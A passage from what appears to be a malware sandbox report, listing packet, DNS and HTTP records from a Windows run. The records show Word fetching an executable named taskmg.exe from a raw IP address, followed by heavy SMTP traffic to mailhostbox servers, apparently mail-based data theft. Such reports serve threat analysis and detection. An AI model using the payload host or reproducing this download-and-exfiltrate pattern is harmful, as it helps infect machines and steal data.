                                                                                                              Nov 25, 2021 18:16:56.613157988 CET49173587192.168.2.22208.91.199.224
                                                                                                              Nov 25, 2021 18:16:56.658663988 CET58749169208.91.199.223192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.737178087 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.737339973 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:56.757332087 CET58749173208.91.199.224192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.757353067 CET58749173208.91.199.224192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.853490114 CET58749173208.91.199.224192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.962841034 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.963052034 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.054610014 CET49173587192.168.2.22208.91.199.224
                                                                                                              Nov 25, 2021 18:16:57.112579107 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.112601995 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.113282919 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.263832092 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.264760971 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.416347027 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.416778088 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.567409992 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.568006992 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.732752085 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.733259916 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.882982016 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:57.883606911 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.883878946 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.884124041 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.884373903 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:57.899187088 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.033406973 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.033503056 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.033720016 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.089658022 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.089797020 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.181412935 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.182288885 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.237678051 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.237730026 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.238255978 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.238290071 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.330243111 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.334315062 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.385979891 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.386002064 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.386008024 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.386096954 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.386212111 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.386266947 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.482208967 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.482280970 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.482309103 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.482491970 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.482563972 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.533956051 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.533998966 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.534015894 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.534033060 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.534145117 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.534182072 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.534293890 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.630373955 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.630423069 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.630448103 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.630474091 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.630498886 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.630675077 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.630748034 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.630773067 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.682137966 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.682183981 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.682252884 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.682279110 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.682426929 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.682435036 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.682534933 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.686333895 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.778419971 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778445959 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778454065 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778532982 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778547049 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778700113 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.778775930 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.778891087 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.778922081 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.779011011 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.830344915 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830430984 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830450058 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830466986 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830485106 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830692053 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830723047 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830724955 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.830826044 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.830842018 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.830866098 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.830898046 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.831090927 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.831154108 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.833976030 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.834002018 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.834153891 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.834172964 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.834270000 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.926594973 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926646948 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926665068 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926693916 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926923037 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.926937103 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926963091 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.926990032 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.927081108 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.927130938 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.978677034 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.978733063 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.978753090 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.978872061 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979017973 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979078054 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979182959 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979207039 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979216099 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979293108 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979362965 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979389906 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979427099 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979454041 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.979537964 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.979599953 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.981781960 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.981858969 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.981899977 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.981956959 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:58.982058048 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:58.982119083 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.074820042 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.074873924 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.074892044 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075020075 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075150967 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075210094 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075222015 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075289965 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075361013 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075386047 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075424910 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075459003 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075500965 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075571060 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075690985 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.075763941 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.075877905 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.076064110 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.076133013 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.076242924 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.076391935 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.126859903 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.126909018 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.126935959 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127027035 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127226114 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127393961 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127422094 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127604008 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127666950 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.127959967 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.128004074 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.128231049 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.128385067 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.128557920 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.128587961 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.129581928 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.129607916 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.129792929 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.222887993 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.222913027 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223061085 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223176003 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223342896 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223355055 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223581076 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223699093 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.223893881 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224070072 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224081993 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224236965 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224251032 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224419117 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224431992 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.224618912 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.230681896 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.406790972 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.691236973 CET49174587192.168.2.22208.91.198.143
                                                                                                              Nov 25, 2021 18:16:59.774890900 CET58749174208.91.198.143192.168.2.22
                                                                                                              Nov 25, 2021 18:16:59.775127888 CET49174587192.168.2.22208.91.198.143

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 18:15:49.490634918 CET5216753192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET53521678.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:15:59.805334091 CET5059153192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET53505918.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:12.298753977 CET5780553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET53578058.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:12.362324953 CET5780553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET53578058.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:21.448317051 CET5903053192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET53590308.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:46.932264090 CET5918553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET53591858.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:55.348798037 CET5561653192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET53556168.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.537000895 CET4997253192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET53499728.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.558620930 CET4997253192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET53499728.8.8.8192.168.2.22

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 25, 2021 18:15:49.490634918 CET192.168.2.228.8.8.80x8b24Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.805334091 CET192.168.2.228.8.8.80x9c20Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.298753977 CET192.168.2.228.8.8.80xf1c3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.362324953 CET192.168.2.228.8.8.80xf1c3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.448317051 CET192.168.2.228.8.8.80x3d18Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.932264090 CET192.168.2.228.8.8.80x11d7Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.348798037 CET192.168.2.228.8.8.80x4b18Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.537000895 CET192.168.2.228.8.8.80xb7b1Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558620930 CET192.168.2.228.8.8.80xb7b1Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • 173.232.204.89

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.2249165173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 25, 2021 18:14:53.977502108 CET0OUTGET /taskmg.exe HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              UA-CPU: AMD64
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                              Host: 173.232.204.89
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 25, 2021 18:14:54.124871969 CET1INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.19.9
                                                                                                              Date: Thu, 25 Nov 2021 17:14:54 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 777216
                                                                                                              Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
                                                                                                              Connection: keep-alive
                                                                                                              ETag: "619f0842-bdc00"
                                                                                                              Accept-Ranges: bytes
